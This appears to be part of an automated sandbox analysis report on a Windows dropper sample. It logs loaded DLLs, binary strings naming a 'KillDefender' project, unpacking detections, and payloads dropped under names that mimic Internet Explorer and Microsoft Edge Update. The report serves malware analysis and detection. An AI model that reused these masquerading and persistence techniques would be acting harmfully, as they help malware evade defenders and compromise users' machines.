Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic file information: File size 42137088 > 1048576
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: Raw size of =0aP is bigger than: 0x100000 < 0x2825e00
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: _hashlib.pyd.15.dr
Source: Binary string: MlcrosoftEdgeUpdate.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\Windows\MlcrosoftEdgeUpdate.pdbpdbate.pdbw source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.15.dr
Source: Binary string: System.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\codes\bound\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmp, Bound.exe, 00000012.00000000.1960600687.00000212527C2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb3 source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb3 source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: System.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: System.Core.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb3 source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\select.pdb source: select.pyd.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: _elementtree.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.pdb source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.15.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb.-H- :-_CorExeMainmscoree.dll source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: mscorlib.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: _ctypes.pyd.15.dr
Source: Binary string: System.Core.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe.21c19320000.0.unpack =0aP:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: 0xCF2C0F01 [Wed Feb 21 19:58:57 2080 UTC]
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: section name: =0aP
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: section name:
Source: VCRUNTIME140.dll.15.drStatic PE information: section name: _RDATA
Source: opencv_videoio_ffmpeg480.dll.15.drStatic PE information: section name: .rodata
Source: libcrypto-1_1.dll.15.drStatic PE information: section name: .00cfg
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /4
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /14
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /29
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /41
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /55
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /67
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /80
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /91
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: section name: /102
Source: libssl-1_1.dll.15.drStatic PE information: section name: .00cfg
Source: cv2.pyd.15.drStatic PE information: section name: IPPCODE
Source: cv2.pyd.15.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B98D2A5 pushad ; iretd 2_2_00007FFD9B98D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BAA83D3 push cs; iretd 2_2_00007FFD9BAA841A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BAA8AAC push eax; iretd 2_2_00007FFD9BAA8ABA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BAA20A8 push E95EAFD2h; ret 2_2_00007FFD9BAA20E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB72316 push 8B485F94h; iretd 2_2_00007FFD9BB7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD9BAC27D4 push ebp; retf 20_2_00007FFD9BAC2832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFD9BAB19BA pushad ; ret 27_2_00007FFD9BAB19C9

Persistence and Installation Behavior

barindex
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile written: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeJump to behavior
Found pyInstaller with non standard icon
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\Bound.exeJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pydJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pydJump to dropped file
